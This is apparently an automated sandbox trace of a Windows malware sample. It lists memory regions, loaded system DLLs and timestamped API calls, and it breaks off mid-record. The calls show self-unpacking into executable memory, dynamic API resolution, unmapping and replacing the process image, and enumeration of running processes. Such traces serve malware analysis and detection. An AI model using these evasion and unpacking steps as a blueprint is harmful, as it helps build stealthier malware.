Region: id = 335 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 336 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 337 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 338 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 339 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 340 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 341 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 342 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 343 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 344 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 345 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 346 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 347 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 348 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 349 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 350 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 351 start_va = 0x420000 end_va = 0x426fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 352 start_va = 0x74630000 end_va = 0x746a4fff entry_point = 0x74630000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 353 start_va = 0x77390000 end_va = 0x77549fff entry_point = 0x77390000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 354 start_va = 0x1e90000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001e90000" filename = "" Region: id = 355 start_va = 0x420000 end_va = 0x420fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 356 start_va = 0x1e90000 end_va = 0x1f47fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e90000" filename = "" Region: id = 357 start_va = 0x1fa0000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 358 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 359 start_va = 0x74610000 end_va = 0x7462cfff entry_point = 0x74610000 region_type = mapped_file name = "dwmapi.dll" filename = "\\Windows\\SysWOW64\\dwmapi.dll" (normalized: "c:\\windows\\syswow64\\dwmapi.dll") Region: id = 360 start_va = 0x75310000 end_va = 0x766cefff entry_point = 0x75310000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 361 start_va = 0x76790000 end_va = 0x76c6cfff entry_point = 0x76790000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 362 start_va = 0x74da0000 end_va = 0x74de3fff entry_point = 0x74da0000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 363 start_va = 0x74ab0000 end_va = 0x74abbfff entry_point = 0x74ab0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 364 start_va = 0x77300000 end_va = 0x7738cfff entry_point = 0x77300000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 365 start_va = 0x77260000 end_va = 0x772a3fff entry_point = 0x77260000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 366 start_va = 0x75180000 end_va = 0x7518efff entry_point = 0x75180000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 367 start_va = 0x430000 end_va = 0x430fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 368 start_va = 0x760000 end_va = 0x7cefff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 369 start_va = 0x1fb0000 end_va = 0x22e6fff entry_point = 0x1fb0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 370 start_va = 0x770d0000 end_va = 0x77161fff entry_point = 0x770d0000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 371 start_va = 0x22f0000 end_va = 0x23d8fff entry_point = 0x22f0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 372 start_va = 0x77170000 end_va = 0x77259fff entry_point = 0x77170000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 373 start_va = 0x440000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 374 start_va = 0x22f0000 end_va = 0x23effff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 375 start_va = 0x7ffd5000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 376 start_va = 0x630000 end_va = 0x630fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000630000" filename = "" Region: id = 377 start_va = 0x76fe0000 end_va = 0x77061fff entry_point = 0x76fe0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 378 start_va = 0x77080000 end_va = 0x770b5fff entry_point = 0x77080000 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 379 start_va = 0x760000 end_va = 0x760fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 380 start_va = 0x744c0000 end_va = 0x74601fff entry_point = 0x744c0000 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 381 start_va = 0x770000 end_va = 0x7affff entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 382 start_va = 0x23f0000 end_va = 0x24effff entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 383 start_va = 0x7fead000 end_va = 0x7feaffff entry_point = 0x0 region_type = private name = "private_0x000000007fead000" filename = "" Region: id = 384 start_va = 0x7b0000 end_va = 0x7b3fff entry_point = 0x7b0000 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 385 start_va = 0x7c0000 end_va = 0x7d2fff entry_point = 0x7c0000 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000001c.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db") Region: id = 386 start_va = 0x7e0000 end_va = 0x7e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007e0000" filename = "" Region: id = 387 start_va = 0x7b0000 end_va = 0x7b3fff entry_point = 0x7b0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 388 start_va = 0x1f50000 end_va = 0x1f92fff entry_point = 0x1f50000 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000013.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000013.db") Region: id = 389 start_va = 0x24f0000 end_va = 0x24f3fff entry_point = 0x24f0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 390 start_va = 0x2500000 end_va = 0x258afff entry_point = 0x2500000 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 391 start_va = 0x2590000 end_va = 0x25a0fff entry_point = 0x2590000 region_type = mapped_file name = "propsys.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\propsys.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\propsys.dll.mui") Region: id = 392 start_va = 0x744a0000 end_va = 0x744b2fff entry_point = 0x744a0000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\SysWOW64\\cryptsp.dll" (normalized: "c:\\windows\\syswow64\\cryptsp.dll") Region: id = 393 start_va = 0x74480000 end_va = 0x7449afff entry_point = 0x74480000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 394 start_va = 0x74450000 end_va = 0x7447efff entry_point = 0x74450000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 395 start_va = 0x25b0000 end_va = 0x25effff entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 396 start_va = 0x25f0000 end_va = 0x26effff entry_point = 0x0 region_type = private name = "private_0x00000000025f0000" filename = "" Region: id = 397 start_va = 0x26f0000 end_va = 0x272ffff entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 398 start_va = 0x2730000 end_va = 0x282ffff entry_point = 0x0 region_type = private name = "private_0x0000000002730000" filename = "" Region: id = 399 start_va = 0x2830000 end_va = 0x286ffff entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 400 start_va = 0x2870000 end_va = 0x296ffff entry_point = 0x0 region_type = private name = "private_0x0000000002870000" filename = "" Region: id = 401 start_va = 0x7fea4000 end_va = 0x7fea6fff entry_point = 0x0 region_type = private name = "private_0x000000007fea4000" filename = "" Region: id = 402 start_va = 0x7fea7000 end_va = 0x7fea9fff entry_point = 0x0 region_type = private name = "private_0x000000007fea7000" filename = "" Region: id = 403 start_va = 0x7feaa000 end_va = 0x7feacfff entry_point = 0x0 region_type = private name = "private_0x000000007feaa000" filename = "" Region: id = 404 start_va = 0x2970000 end_va = 0x2970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002970000" filename = "" Region: id = 405 start_va = 0x2970000 end_va = 0x2970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002970000" filename = "" Region: id = 406 start_va = 0x2970000 end_va = 0x2977fff entry_point = 0x2970000 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\windows.storage.dll.mui") Region: id = 407 start_va = 0x74420000 end_va = 0x74447fff entry_point = 0x74420000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 408 start_va = 0x2980000 end_va = 0x2980fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002980000" filename = "" Thread: id = 3 os_tid = 0xe8c [0110.961] RegOpenKeyA (in: hKey=0x80000000, lpSubKey="interface\\{aa5b6a80-b834-11d0-932f-00a0c90dcaa9}", phkResult=0x45214c | out: phkResult=0x45214c*=0xaa) returned 0x0 [0110.962] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0110.962] RegQueryValueExW (in: hKey=0xaa, lpValueName="", lpReserved=0x0, lpType=0x19ff54, lpData=0x19fcf0, lpcbData=0x19ff4c*=0x12c | out: lpType=0x19ff54*=0x1, lpData="IActiveScriptParseProcedure32", lpcbData=0x19ff4c*=0x3c) returned 0x0 [0110.962] VirtualAlloc (lpAddress=0x0, dwSize=0x14800, flAllocationType=0x3000, flProtect=0x40) returned 0x3e0000 [0111.678] GetProcAddress (hModule=0x74f40000, lpProcName="LoadLibraryExA") returned 0x74f59f60 [0111.678] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x74f40000 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="mknjht34tfserdgfwGetProcAddress") returned 0x0 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="GetProcAddress") returned 0x74f57940 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualAlloc") returned 0x74f58b70 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="LoadLibraryExA") returned 0x74f59f60 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="SetFilePointer") returned 0x74f66530 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="lstrlenA") returned 0x74f63a30 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="lstrcatA") returned 0x74f5efc0 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualProtect") returned 0x74f58c50 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="UnmapViewOfFile") returned 0x74f594b0 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="GetModuleHandleA") returned 0x74f59640 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="WriteFile") returned 0x74f66590 [0111.679] GetProcAddress (hModule=0x74f40000, lpProcName="CloseHandle") returned 0x74f65f20 [0111.680] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualFree") returned 0x74f58c70 [0111.680] GetProcAddress (hModule=0x74f40000, lpProcName="GetTempPathA") returned 0x74f66410 [0111.680] GetProcAddress (hModule=0x74f40000, lpProcName="CreateFileA") returned 0x74f66170 [0111.680] GetProcAddress (hModule=0x74f40000, lpProcName="VirtualAlloc") returned 0x74f58b70 [0111.680] VirtualAlloc (lpAddress=0x0, dwSize=0x13a00, flAllocationType=0x3000, flProtect=0x40) returned 0x610000 [0111.681] VirtualAlloc (lpAddress=0x0, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x740000 [0111.683] VirtualProtect (in: lpAddress=0x1000, dwSize=0xf744, flNewProtect=0x9088158b, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0111.683] VirtualProtect (in: lpAddress=0x11000, dwSize=0xb00, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0111.683] VirtualProtect (in: lpAddress=0x12000, dwSize=0x6600, flNewProtect=0x4290880d, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0111.683] VirtualProtect (in: lpAddress=0x19000, dwSize=0x614, flNewProtect=0x8b7c0a40, lpflOldProtect=0x19fec0 | out: lpflOldProtect=0x19fec0*=0x0) returned 0 [0111.683] UnmapViewOfFile (lpBaseAddress=0x400000) returned 1 [0111.684] VirtualAlloc (lpAddress=0x400000, dwSize=0x1a000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000 [0111.688] GetCurrentProcessId () returned 0xe88 [0111.688] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xac [0111.692] Process32FirstW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.692] GetCurrentProcessId () returned 0xe88 [0111.692] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x61, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0111.693] GetCurrentProcessId () returned 0xe88 [0111.693] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0111.693] GetCurrentProcessId () returned 0xe88 [0111.693] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.694] GetCurrentProcessId () returned 0xe88 [0111.694] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0111.695] GetCurrentProcessId () returned 0xe88 [0111.695] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.695] GetCurrentProcessId () returned 0xe88 [0111.695] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0111.696] GetCurrentProcessId () returned 0xe88 [0111.696] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0111.697] GetCurrentProcessId () returned 0xe88 [0111.697] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0111.697] GetCurrentProcessId () returned 0xe88 [0111.697] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.698] GetCurrentProcessId () returned 0xe88 [0111.698] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.699] GetCurrentProcessId () returned 0xe88 [0111.699] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0111.699] GetCurrentProcessId () returned 0xe88 [0111.699] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.700] GetCurrentProcessId () returned 0xe88 [0111.700] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.701] GetCurrentProcessId () returned 0xe88 [0111.701] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.701] GetCurrentProcessId () returned 0xe88 [0111.701] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.702] GetCurrentProcessId () returned 0xe88 [0111.702] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.702] GetCurrentProcessId () returned 0xe88 [0111.703] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.703] GetCurrentProcessId () returned 0xe88 [0111.703] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x164, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0111.704] GetCurrentProcessId () returned 0xe88 [0111.704] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x420, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.704] GetCurrentProcessId () returned 0xe88 [0111.704] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x444, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.705] GetCurrentProcessId () returned 0xe88 [0111.705] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0111.705] GetCurrentProcessId () returned 0xe88 [0111.705] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x678, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.706] GetCurrentProcessId () returned 0xe88 [0111.706] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x704, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0111.707] GetCurrentProcessId () returned 0xe88 [0111.707] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x77c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0111.707] GetCurrentProcessId () returned 0xe88 [0111.707] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x38, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0111.708] GetCurrentProcessId () returned 0xe88 [0111.708] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0111.709] GetCurrentProcessId () returned 0xe88 [0111.709] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x980, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2c, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0111.709] GetCurrentProcessId () returned 0xe88 [0111.709] Process32NextW (in: hSnapshot=0xac, lppe=0x19fa14 | out: lppe=0x19fa14*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x21, th32ParentProcessID=0x23c, pcPriClassBase=8, dwFlags=0x0, 